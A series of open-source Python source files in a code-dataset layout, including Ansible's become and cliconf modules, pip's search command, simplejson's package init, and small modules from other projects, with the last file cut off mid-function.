# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import hr_timesheet_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
total-impact/total-impact-webapp | refs/heads/master | totalimpactwebapp/refresh_status.py | 2 | from totalimpactwebapp import db
from util import cached_property
from util import commit
from util import dict_from_dir
import logging
logger = logging.getLogger("ti.refresh_status")
def save_profile_refresh_status(profile, status_string):
profile.refresh_status = status_string
db.session.add(profile)
commit(db)
class RefreshStatus(object):
states = {
"PROGRESS_BAR": "progress bar",
"CRUNCHING": "crunching",
"ALL_DONE": "all done"
}
def __init__(self, profile):
self.profile = profile
self.products = profile.display_products
@property
def refresh_state(self):
return self.profile.refresh_status
@property
def is_done_refreshing(self):
return self.num_refreshing==0
@property
def num_refreshing(self):
return sum([product.is_refreshing for product in self.products])
@property
def num_complete(self):
return len(self.products) - self.num_refreshing
# @property
# def product_problem_statuses(self):
# product_problem_statuses = [(product.tiid, product.last_refresh_status) for product in self.products if not product.finished_successful_refresh]
# return product_problem_statuses
# @property
# def product_refresh_failure_messages(self):
# failure_messages = [(product.tiid, product.last_refresh_failure_message) for product in self.products if product.last_refresh_failure_message]
# return failure_messages
@property
def percent_complete(self):
try:
precise = float(self.num_complete) / len(self.products) * 100
except ZeroDivisionError:
precise = 100
return int(precise)
def to_dict(self):
attributes_to_exclude = [
"states",
"products",
"profile"
]
return dict_from_dir(self, attributes_to_exclude)
|
DrDub/pilas | refs/heads/master | pilasengine/tareas/tarea.py | 6 | # -*- encoding: utf-8 -*-
# pilas engine: un motor para hacer videojuegos
#
# Copyright 2010-2014 - Hugo Ruscitti
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
#
# Website - http://www.pilas-engine.com.ar
from pilasengine.actores.actor import ActorEliminadoException
class Tarea(object):
def __init__(self, planificador, pilas, una_vez, time_out, dt, funcion,
*args, **kwargs):
"""Representa una tarea que se puede ejecutar dentro del planificador.
:param time_out: El tiempo absoluto para ejecutar la tarea.
:param dt: La frecuencia de ejecución.
:param funcion: La funcion a invocar.
:param parametros: Una lista de argumentos para la funcion anterior.
:param una_vez: Indica si la funcion se tiene que ejecutar una sola vez.
"""
self.planificador = planificador
self.una_vez = una_vez
self.time_out = time_out
self.dt = dt
self.funcion = funcion
self.args, self.kwargs = args, kwargs
self.pilas = pilas
def ejecutar(self):
"Ejecuta la tarea."
try:
return self.funcion(*self.args, **self.kwargs)
except ActorEliminadoException:
self.pilas.log("Se evitó ejecutar la tarea sobre un actor eliminado...")
def eliminar(self):
"Quita la tarea del planificador para que no se vuelva a ejecutar."
self.planificador.eliminar_tarea(self)
def terminar(self):
"Termina la tarea (alias de eliminar)."
self.eliminar() |
g-k/servo | refs/heads/master | tests/wpt/web-platform-tests/webdriver/runtests.py | 212 | import unittest
from unittest import TestLoader, TextTestRunner, TestSuite
if __name__ == "__main__":
loader = TestLoader()
suite = TestSuite((
loader.discover(".", pattern="*.py")
))
runner = TextTestRunner(verbosity=2)
runner.run(suite)
unittest.main()
|
scw/ansible | refs/heads/devel | lib/ansible/playbook/become.py | 150 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleParserError
from ansible.playbook.attribute import Attribute, FieldAttribute
#from ansible.utils.display import deprecated
class Become:
    # Privilege escalation
_become = FieldAttribute(isa='bool')
_become_method = FieldAttribute(isa='string')
_become_user = FieldAttribute(isa='string')
def __init__(self):
return super(Become, self).__init__()
def _detect_privilege_escalation_conflict(self, ds):
# Fail out if user specifies conflicting privilege escalations
        has_become = 'become' in ds or 'become_user' in ds
has_sudo = 'sudo' in ds or 'sudo_user' in ds
has_su = 'su' in ds or 'su_user' in ds
if has_become:
msg = 'The become params ("become", "become_user") and'
if has_sudo:
raise AnsibleParserError('%s sudo params ("sudo", "sudo_user") cannot be used together' % msg)
elif has_su:
raise AnsibleParserError('%s su params ("su", "su_user") cannot be used together' % msg)
elif has_sudo and has_su:
raise AnsibleParserError('sudo params ("sudo", "sudo_user") and su params ("su", "su_user") cannot be used together')
def _preprocess_data_become(self, ds):
"""Preprocess the playbook data for become attributes
This is called from the Base object's preprocess_data() method which
in turn is called pretty much anytime any sort of playbook object
(plays, tasks, blocks, etc) are created.
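        For example (illustrative values), a task defined with the legacy keys
        ``sudo: yes`` and ``sudo_user: root`` is rewritten here to
        ``become: True``, ``become_method: 'sudo'`` and ``become_user: 'root'``.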
"""
self._detect_privilege_escalation_conflict(ds)
# Privilege escalation, backwards compatibility for sudo/su
if 'sudo' in ds or 'sudo_user' in ds:
ds['become_method'] = 'sudo'
if 'sudo' in ds:
ds['become'] = ds['sudo']
del ds['sudo']
else:
ds['become'] = True
if 'sudo_user' in ds:
ds['become_user'] = ds['sudo_user']
del ds['sudo_user']
#deprecated("Instead of sudo/sudo_user, use become/become_user and set become_method to 'sudo' (default)")
elif 'su' in ds or 'su_user' in ds:
ds['become_method'] = 'su'
if 'su' in ds:
ds['become'] = ds['su']
del ds['su']
else:
ds['become'] = True
if 'su_user' in ds:
ds['become_user'] = ds['su_user']
del ds['su_user']
#deprecated("Instead of su/su_user, use become/become_user and set become_method to 'su' (default is sudo)")
# if we are becoming someone else, but some fields are unset,
# make sure they're initialized to the default config values
if ds.get('become', False):
if ds.get('become_method', None) is None:
ds['become_method'] = C.DEFAULT_BECOME_METHOD
if ds.get('become_user', None) is None:
ds['become_user'] = C.DEFAULT_BECOME_USER
return ds
def _get_attr_become(self):
'''
Override for the 'become' getattr fetcher, used from Base.
'''
if hasattr(self, '_get_parent_attribute'):
return self._get_parent_attribute('become')
else:
return self._attributes['become']
def _get_attr_become_method(self):
'''
Override for the 'become_method' getattr fetcher, used from Base.
'''
if hasattr(self, '_get_parent_attribute'):
return self._get_parent_attribute('become_method')
else:
return self._attributes['become_method']
def _get_attr_become_user(self):
'''
Override for the 'become_user' getattr fetcher, used from Base.
'''
if hasattr(self, '_get_parent_attribute'):
return self._get_parent_attribute('become_user')
else:
return self._attributes['become_user']
|
abhishekjairath/codeyard | refs/heads/master | commit/lib/python2.7/site-packages/pip/commands/search.py | 344 | import sys
import textwrap
import pip.download
from pip.basecommand import Command, SUCCESS
from pip.util import get_terminal_size
from pip.log import logger
from pip.backwardcompat import xmlrpclib, reduce, cmp
from pip.exceptions import CommandError
from pip.status_codes import NO_MATCHES_FOUND
from pip._vendor import pkg_resources
from distutils.version import StrictVersion, LooseVersion
class SearchCommand(Command):
"""Search for PyPI packages whose name or summary contains <query>."""
name = 'search'
usage = """
%prog [options] <query>"""
summary = 'Search PyPI for packages.'
def __init__(self, *args, **kw):
super(SearchCommand, self).__init__(*args, **kw)
self.cmd_opts.add_option(
'--index',
dest='index',
metavar='URL',
default='https://pypi.python.org/pypi',
help='Base URL of Python Package Index (default %default)')
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
if not args:
raise CommandError('Missing required argument (search query).')
query = args
index_url = options.index
pypi_hits = self.search(query, index_url)
hits = transform_hits(pypi_hits)
terminal_width = None
if sys.stdout.isatty():
terminal_width = get_terminal_size()[0]
print_results(hits, terminal_width=terminal_width)
if pypi_hits:
return SUCCESS
return NO_MATCHES_FOUND
def search(self, query, index_url):
pypi = xmlrpclib.ServerProxy(index_url)
hits = pypi.search({'name': query, 'summary': query}, 'or')
return hits
def transform_hits(hits):
"""
The list from pypi is really a list of versions. We want a list of
packages with the list of versions stored inline. This converts the
list from pypi into one we can use.
"""
packages = {}
for hit in hits:
name = hit['name']
summary = hit['summary']
version = hit['version']
score = hit['_pypi_ordering']
if score is None:
score = 0
if name not in packages.keys():
packages[name] = {'name': name, 'summary': summary, 'versions': [version], 'score': score}
else:
packages[name]['versions'].append(version)
# if this is the highest version, replace summary and score
if version == highest_version(packages[name]['versions']):
packages[name]['summary'] = summary
packages[name]['score'] = score
# each record has a unique name now, so we will convert the dict into a list sorted by score
package_list = sorted(packages.values(), key=lambda x: x['score'], reverse=True)
return package_list
def print_results(hits, name_column_width=25, terminal_width=None):
installed_packages = [p.project_name for p in pkg_resources.working_set]
for hit in hits:
name = hit['name']
summary = hit['summary'] or ''
if terminal_width is not None:
# wrap and indent summary to fit terminal
summary = textwrap.wrap(summary, terminal_width - name_column_width - 5)
summary = ('\n' + ' ' * (name_column_width + 3)).join(summary)
line = '%s - %s' % (name.ljust(name_column_width), summary)
try:
logger.notify(line)
if name in installed_packages:
dist = pkg_resources.get_distribution(name)
logger.indent += 2
try:
latest = highest_version(hit['versions'])
if dist.version == latest:
logger.notify('INSTALLED: %s (latest)' % dist.version)
else:
logger.notify('INSTALLED: %s' % dist.version)
logger.notify('LATEST: %s' % latest)
finally:
logger.indent -= 2
except UnicodeEncodeError:
pass
def compare_versions(version1, version2):
try:
return cmp(StrictVersion(version1), StrictVersion(version2))
# in case of abnormal version number, fall back to LooseVersion
except ValueError:
pass
try:
return cmp(LooseVersion(version1), LooseVersion(version2))
except TypeError:
        # certain LooseVersion comparisons raise due to unorderable types,
# fallback to string comparison
return cmp([str(v) for v in LooseVersion(version1).version],
[str(v) for v in LooseVersion(version2).version])
def highest_version(versions):
return reduce((lambda v1, v2: compare_versions(v1, v2) == 1 and v1 or v2), versions)
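# For illustration: highest_version(['1.0', '1.10', '1.2']) returns '1.10',
# because compare_versions() orders release numbers numerically rather than
# lexicographically (as a plain string comparison would).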
|
MiLk/ansible | refs/heads/devel | lib/ansible/plugins/cliconf/__init__.py | 44 | #
# (c) 2017 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import signal
from abc import ABCMeta, abstractmethod
from functools import wraps
from ansible.errors import AnsibleError, AnsibleConnectionFailure
from ansible.module_utils.six import with_metaclass
try:
from scp import SCPClient
HAS_SCP = True
except ImportError:
HAS_SCP = False
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
def enable_mode(func):
@wraps(func)
def wrapped(self, *args, **kwargs):
prompt = self.get_prompt()
if not str(prompt).strip().endswith('#'):
raise AnsibleError('operation requires privilege escalation')
return func(self, *args, **kwargs)
return wrapped
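# For illustration, a platform cliconf could guard a privileged call with the
# decorator above (the method body here is a sketch, not part of this module):
#
#   @enable_mode
#   def get_config(self, source='running', format='text'):
#       return self.send_command('show running-config')
#
# so the call fails fast unless the current prompt ends with '#'.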
class CliconfBase(with_metaclass(ABCMeta, object)):
"""
A base class for implementing cli connections
.. note:: Unlike most of Ansible, nearly all strings in
:class:`CliconfBase` plugins are byte strings. This is because of
how close to the underlying platform these plugins operate. Remember
to mark literal strings as byte string (``b"string"``) and to use
:func:`~ansible.module_utils._text.to_bytes` and
:func:`~ansible.module_utils._text.to_text` to avoid unexpected
problems.
List of supported rpc's:
:get_config: Retrieves the specified configuration from the device
:edit_config: Loads the specified commands into the remote device
:get: Execute specified command on remote device
:get_capabilities: Retrieves device information and supported rpc methods
:commit: Load configuration from candidate to running
:discard_changes: Discard changes to candidate datastore
Note: List of supported rpc's for remote device can be extracted from
output of get_capabilities()
:returns: Returns output received from remote device as byte string
Usage:
from ansible.module_utils.connection import Connection
conn = Connection()
        conn.get('show lldp neighbors detail')
conn.get_config('running')
conn.edit_config(['hostname test', 'netconf ssh'])
"""
def __init__(self, connection):
self._connection = connection
def _alarm_handler(self, signum, frame):
raise AnsibleConnectionFailure('timeout waiting for command to complete')
def send_command(self, command, prompt=None, answer=None, sendonly=False):
"""Executes a cli command and returns the results
This method will execute the CLI command on the connection and return
the results to the caller. The command output will be returned as a
string
"""
timeout = self._connection._play_context.timeout or 30
signal.signal(signal.SIGALRM, self._alarm_handler)
signal.alarm(timeout)
display.display("command: %s" % command, log_only=True)
resp = self._connection.send(command, prompt, answer, sendonly)
signal.alarm(0)
return resp
def get_prompt(self):
"""Returns the current prompt from the device"""
return self._connection._matched_prompt
def get_base_rpc(self):
"""Returns list of base rpc method supported by remote device"""
return ['get_config', 'edit_config', 'get_capabilities', 'get']
@abstractmethod
def get_config(self, source='running', format='text'):
"""Retrieves the specified configuration from the device
This method will retrieve the configuration specified by source and
return it to the caller as a string. Subsequent calls to this method
will retrieve a new configuration from the device
:args:
arg[0] source: Datastore from which configuration should be retrieved eg: running/candidate/startup. (optional)
default is running.
arg[1] format: Output format in which configuration is retrieved
Note: Specified datastore should be supported by remote device.
:kwargs:
Keywords supported
:command: the command string to execute
:source: Datastore from which configuration should be retrieved
:format: Output format in which configuration is retrieved
:returns: Returns output received from remote device as byte string
"""
pass
@abstractmethod
def edit_config(self, commands):
"""Loads the specified commands into the remote device
This method will load the commands into the remote device. This
method will make sure the device is in the proper context before
        sending the commands (eg config mode)
:args:
arg[0] command: List of configuration commands
:kwargs:
Keywords supported
:command: the command string to execute
:returns: Returns output received from remote device as byte string
"""
pass
@abstractmethod
def get(self, *args, **kwargs):
"""Execute specified command on remote device
This method will retrieve the specified data and
return it to the caller as a string.
:args:
arg[0] command: command in string format to be executed on remote device
arg[1] prompt: the expected prompt generated by executing command.
This can be a string or a list of strings (optional)
arg[2] answer: the string to respond to the prompt with (optional)
arg[3] sendonly: bool to disable waiting for response, default is false (optional)
:kwargs:
:command: the command string to execute
:prompt: the expected prompt generated by executing command.
This can be a string or a list of strings
:answer: the string to respond to the prompt with
:sendonly: bool to disable waiting for response
:returns: Returns output received from remote device as byte string
"""
pass
@abstractmethod
def get_capabilities(self):
"""Retrieves device information and supported
rpc methods by device platform and return result
as a string
:returns: Returns output received from remote device as byte string
"""
pass
def commit(self, comment=None):
"""Commit configuration changes"""
return self._connection.method_not_found("commit is not supported by network_os %s" % self._play_context.network_os)
def discard_changes(self):
"Discard changes in candidate datastore"
return self._connection.method_not_found("discard_changes is not supported by network_os %s" % self._play_context.network_os)
def put_file(self, source, destination):
"""Copies file over scp to remote device"""
if not HAS_SCP:
self._connection.internal_error("Required library scp is not installed. Please install it using `pip install scp`")
ssh = self._connection._connect_uncached()
with SCPClient(ssh.get_transport()) as scp:
scp.put(source, destination)
def fetch_file(self, source, destination):
"""Fetch file over scp from remote device"""
if not HAS_SCP:
self._connection.internal_error("Required library scp is not installed. Please install it using `pip install scp`")
ssh = self._connection._connect_uncached()
with SCPClient(ssh.get_transport()) as scp:
scp.get(source, destination)
|
mou4e/zirconium | refs/heads/master | third_party/simplejson/__init__.py | 175 | r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`simplejson` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility with Python 2.4 and Python 2.5 and (currently) has
significant performance advantages, even without using the optional C
extension for speedups.
Encoding basic Python object hierarchies::
>>> import simplejson as json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print json.dumps("\"foo\bar")
"\"foo\bar"
>>> print json.dumps(u'\u1234')
"\u1234"
>>> print json.dumps('\\')
"\\"
>>> print json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson as json
>>> json.dumps([1,2,3,{'4': 5, '6': 7}], separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson as json
>>> s = json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=' ')
>>> print '\n'.join([l.rstrip() for l in s.splitlines()])
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson as json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import simplejson as json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> from decimal import Decimal
>>> json.loads('1.1', parse_float=Decimal) == Decimal('1.1')
True
Specializing JSON object encoding::
>>> import simplejson as json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
    ...     raise TypeError(repr(obj) + " is not JSON serializable")
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using simplejson.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expecting property name: line 1 column 2 (char 2)
"""
__version__ = '2.6.2'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONDecodeError', 'JSONEncoder',
'OrderedDict', 'simple_first',
]
__author__ = 'Bob Ippolito <[email protected]>'
from decimal import Decimal
from decoder import JSONDecoder, JSONDecodeError
from encoder import JSONEncoder, JSONEncoderForHTML
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
import ordered_dict
return ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
def _import_c_make_encoder():
try:
from simplejson._speedups import make_encoder
return make_encoder
except ImportError:
return None
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
use_decimal=True,
namedtuple_as_object=True,
tuple_as_array=True,
bigint_as_string=False,
item_sort_key=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=True,
namedtuple_as_object=True, tuple_as_array=True,
bigint_as_string=False, sort_keys=False, item_sort_key=None,
**kw):
"""Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If ``skipkeys`` is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
    If ``ensure_ascii`` is false, then some chunks written to ``fp``
may be ``unicode`` instances, subject to normal Python ``str`` to
``unicode`` coercion rules. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter()``) this is likely
to cause an error.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
in strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If *indent* is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *use_decimal* is true (default: ``True``) then decimal.Decimal
will be natively serialized to JSON with full precision.
If *namedtuple_as_object* is true (default: ``True``),
:class:`tuple` subclasses with ``_asdict()`` methods will be encoded
as JSON objects.
If *tuple_as_array* is true (default: ``True``),
:class:`tuple` (and subclasses) will be encoded as JSON arrays.
If *bigint_as_string* is true (default: ``False``), ints 2**53 and higher
or lower than -2**53 will be encoded as strings. This is to avoid the
rounding that happens in Javascript otherwise. Note that this is still a
lossy operation that will not round-trip correctly and should be used
sparingly.
If specified, *item_sort_key* is a callable used to sort the items in
each dictionary. This is useful if you want to sort items other than
in alphabetical order by key. This option takes precedence over
*sort_keys*.
If *sort_keys* is true (default: ``False``), the output of dictionaries
will be sorted by item.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and use_decimal
and namedtuple_as_object and tuple_as_array
and not bigint_as_string and not item_sort_key and not kw):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, use_decimal=use_decimal,
namedtuple_as_object=namedtuple_as_object,
tuple_as_array=tuple_as_array,
bigint_as_string=bigint_as_string,
sort_keys=sort_keys,
item_sort_key=item_sort_key,
**kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=True,
namedtuple_as_object=True, tuple_as_array=True,
bigint_as_string=False, sort_keys=False, item_sort_key=None,
**kw):
"""Serialize ``obj`` to a JSON formatted ``str``.
    If ``skipkeys`` is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is false, then the return value will be a
``unicode`` instance subject to normal Python ``str`` to ``unicode``
coercion rules instead of being escaped to an ASCII ``str``.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *use_decimal* is true (default: ``True``) then decimal.Decimal
will be natively serialized to JSON with full precision.
If *namedtuple_as_object* is true (default: ``True``),
:class:`tuple` subclasses with ``_asdict()`` methods will be encoded
as JSON objects.
If *tuple_as_array* is true (default: ``True``),
:class:`tuple` (and subclasses) will be encoded as JSON arrays.
If *bigint_as_string* is true (not the default), ints 2**53 and higher
or lower than -2**53 will be encoded as strings. This is to avoid the
rounding that happens in Javascript otherwise.
If specified, *item_sort_key* is a callable used to sort the items in
each dictionary. This is useful if you want to sort items other than
    in alphabetical order by key. This option takes precedence over
*sort_keys*.
If *sort_keys* is true (default: ``False``), the output of dictionaries
will be sorted by item.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and use_decimal
and namedtuple_as_object and tuple_as_array
and not bigint_as_string and not sort_keys
and not item_sort_key and not kw):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
use_decimal=use_decimal,
namedtuple_as_object=namedtuple_as_object,
tuple_as_array=tuple_as_array,
bigint_as_string=bigint_as_string,
sort_keys=sort_keys,
item_sort_key=item_sort_key,
**kw).encode(obj)
_default_decoder = JSONDecoder(encoding=None, object_hook=None,
object_pairs_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, namedtuple_as_object=True, tuple_as_array=True,
**kw):
"""Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, object_pairs_hook=object_pairs_hook,
use_decimal=use_decimal, **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, **kw):
"""Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and object_pairs_hook is None
and not use_decimal and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if object_pairs_hook is not None:
kw['object_pairs_hook'] = object_pairs_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
if use_decimal:
if parse_float is not None:
raise TypeError("use_decimal=True implies parse_float=Decimal")
kw['parse_float'] = Decimal
